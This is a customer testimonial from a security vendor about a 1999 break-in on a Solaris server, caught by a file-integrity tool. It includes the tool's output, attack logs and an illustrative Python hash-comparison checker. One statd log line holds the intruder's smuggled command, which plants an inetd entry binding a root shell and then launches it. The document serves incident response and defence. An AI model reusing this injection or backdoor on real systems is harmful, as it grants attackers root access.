
This report was written by the customer who is using the product. CyberSoft's only edits to the document were to remove the organization name (at their request) and improve formatting for ease of reading.
As an Internet Administrator whose main servers are Sun Unix systems, I always seem to be fighting that never-ending battle of keeping crackers off my computers. Even with the security patches, router access control and just simply phoning providers after finding someone suspiciously banging on our door, one of those perps got lucky.
One morning I tried to log into our main Sun after a long weekend and found that my terminal was booby-trapped. No matter what key I hit, garbage came whizzing by on the monitor. Hopefully, being a little smarter than those other joes, I did not do a "stop a". Instead I did a Telnet into the server from another computer and looked around. If it wasn't for your CyberSoft Cryptographic Integrity Tool, I would never have known that my /etc/rc* boot files were modified. If I had done the reboot like that slug wanted me to, all the boot files that replaced mine would have taken effect. Instead I noted all the modified files in the CIT output listing, loaded a backup tape and put everything back like it should have been. I must say that the CIT has really made my life administering my system easier. Besides saving my proverbial skin that day and using it other times to check for suspicious changes, I look at that output every day to give me an indication of what is going on on the whole system. Great Tool.
I would say it took about 1 hour to fix and 10 minutes to figure out where tunaman (the cracker) came from. There were more files added or modified than those in the /etc/rc* directories - see CIT output below.
Cryptographic Integrity Tool 2.5.1 run of Mon Aug. 30 02:30:00 1999
New files:
/etc/shells
/usr/bin/xstat
/var/spool/calendar/callog.root.BRG
/var/spool/calendar/callog.root.LNA
/var/spool/calendar/callog.root.SPN
Modified files:
/etc/init.d/nfs.client
/etc/init.d/rpc
/etc/oshadow
/etc/rc0.d/K75nfs.client
/etc/rc0.d/K85rpc
/etc/rc1.d/K67rpc
/etc/rc1.d/K80nfs.client
/etc/rc2.d/S71rpc
/etc/rc2.d/S73nfs.client
/usr/bin/login
/usr/sbin/inetd
Aug 29 09:35:12 mciunix inetd[121]: accept: Protocol error
Aug 29 17:03:25 mciunix statd[124]: attempt to create "/var/statmon/sm/; echo "pcserver
stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
Aug 29 17:07:37 mciunix inetd[121]: /usr/openwin/bin/rpc.cmsd: Child Status Changed
Aug 29 17:08:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:08:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:18:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:28:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:38:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:46:55 mciunix inetd[10414]: rusersd/rpc/datagram_v,circuit_v: tli_socket: No such file or directory
Aug 29 18:09:44 mciunix inetd[10639]: rusersd/rpc/datagram_v,circuit_v: tli_socket: No such file or directory
Aug 29 18:32:44 mciunix inetd[10639]: accept: Protocol error
Aug 29 18:32:44 mciunix inetd[10639]: accept: Protocol error
Aug 29 18:32:45 mciunix inetd[10639]: accept: Protocol error
lastout:tunaman ftp ppp-206-170-224- Sun Aug 29 17:45 - 17:46 (00:00)
lastout:tunaman ftp ppp-206-170-224- Sun Aug 29 17:44 - 17:45 (00:01)
lastout:tunaman pts/1 ppp-206-170-224- Sun Aug 29 17:43 - 17:43 (00:00)
tunaman ppp-206-170-224-218.nhwd02.pacbell.net
tunaman ppp-206-170-224-218.nhwd02.pacbell.net
shadow:tunaman::10832:0:0::::
callog.root callog.root.BRG callog.root.LNA callog.root.SPN
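The kind of check CIT performed above, written out as an added example (not CyberSoft's code): take a cryptographic baseline of a file tree, re-hash it later, and report new, modified and removed files in the same two-section style as the listing. The directory layout and file contents are constructed; the baseline dictionary would in practice be kept on read-only or offline media so an intruder cannot rewrite it along with the files.

```python
import hashlib
import tempfile
from pathlib import Path


def file_digest(path: Path) -> str:
    """SHA-256 of a file's contents. Content hashes, not mtimes, are compared
    because timestamps are trivially reset by anyone with root."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Map every regular file under root (path relative to root) to its digest."""
    return {p.relative_to(root).as_posix(): file_digest(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(baseline: dict, current: dict) -> dict:
    """Classify paths the way the CIT listing does: new, modified, removed."""
    return {
        "new": sorted(set(current) - set(baseline)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
        "removed": sorted(set(baseline) - set(current)),
    }


def format_report(diff: dict) -> str:
    """Render the comparison in the same section layout as the CIT output."""
    lines = ["New files:"] + diff["new"] + ["Modified files:"] + diff["modified"]
    if diff["removed"]:
        lines += ["Removed files:"] + diff["removed"]
    return "\n".join(lines)


def demo() -> dict:
    """Constructed scenario: baseline a fake /etc, then alter a boot script
    and drop a new file, as happened in the incident described above."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "rc2.d").mkdir()
        (root / "rc2.d" / "S71rpc").write_text("#!/sbin/sh\n/usr/sbin/rpcbind\n")
        (root / "inetd.conf").write_text("ftp stream tcp nowait root in.ftpd in.ftpd\n")
        baseline = snapshot(root)                      # taken while the system is clean
        (root / "rc2.d" / "S71rpc").write_text("#!/sbin/sh\n# tampered\n")  # modified
        (root / "shells").write_text("/bin/sh\n")      # new file, as /etc/shells was
        return compare(baseline, snapshot(root))
```

Running `print(format_report(demo()))` prints the altered boot script under "Modified files:" and the dropped file under "New files:", which is exactly the signal the administrator read before deciding not to reboot.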
Copyright April 2001 by CyberSoft, Inc. All rights reserved. VFind is a registered trademark of CyberSoft, Inc. VSTK, VSTKP, VSTKCW, UAD and MvFilter are trademarks of CyberSoft, Inc.